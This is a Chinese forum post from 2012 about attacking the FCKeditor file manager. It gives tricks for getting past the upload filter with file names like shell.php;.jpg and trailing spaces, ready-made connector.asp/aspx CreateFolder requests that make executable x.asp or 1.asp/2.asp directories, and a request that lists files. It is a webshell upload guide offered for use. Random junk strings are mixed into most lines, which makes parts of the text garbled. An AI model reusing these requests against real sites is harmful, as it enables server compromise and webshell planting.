很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg6 t5 W% ?# N* K9 {0 q
9 T$ `9 b+ s% s提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
4 x% p, Z" Q- p. F6 g2 t
5 [% F( y3 z1 r+ ^* g0 ~6 w5 j继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
U0 |( m0 L% K' Q, ? n
# d. e' Z1 Y/ ?7 {& c$ L突破建立文件夹:
7 |4 n D) q4 r/ c: I; o% E
6 j# W* y; [ e+ [editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp/ H7 S ]; e3 a; Z3 A- i
+ h8 I8 W' W7 _5 w8 q/ \7 Z参数:' v% y( b8 I8 J
) x: Y& D1 V b8 G* D N d& s当前目录名:CurrentFolder=/qing.asp
C3 D p- t+ |" V' D
8 \: @% R: S& [4 n# s& `新的目录名:NewFolderName=x.asp
/ d( r o( x. {* w( o" O
& C5 [" }- E4 ~0 ~' R$ e+ L% Y其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
5 ?0 ?* l V& r( Y; u2 N; y
0 a8 M* \' h- N那么 x.asp 就已经建立生成了,此方法百试百灵!
H( Y4 u/ y4 I1 I3 R* k \% K4 g$ {1 z1 t0 k
新建文件夹参数 x.asp,基本都能搞定。
8 D$ u, D# [+ X+ {/ V t+ a' O% F
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
; S" ^; W6 |: U# T% @( \( y' a5 C
4 C, P N5 B: q8 ^aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
2 Q% r$ F0 }3 p! x7 `- {; u5 e z
获取文件列表
( o* J* x% }* n2 V5 E/ b aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
! X" q, T6 y! P& h g& \0 |! I
w5 q" b5 w& [* \( W& ^2 P+ t |
发表于 2012-12-31 09:27:09
收藏
支持
反对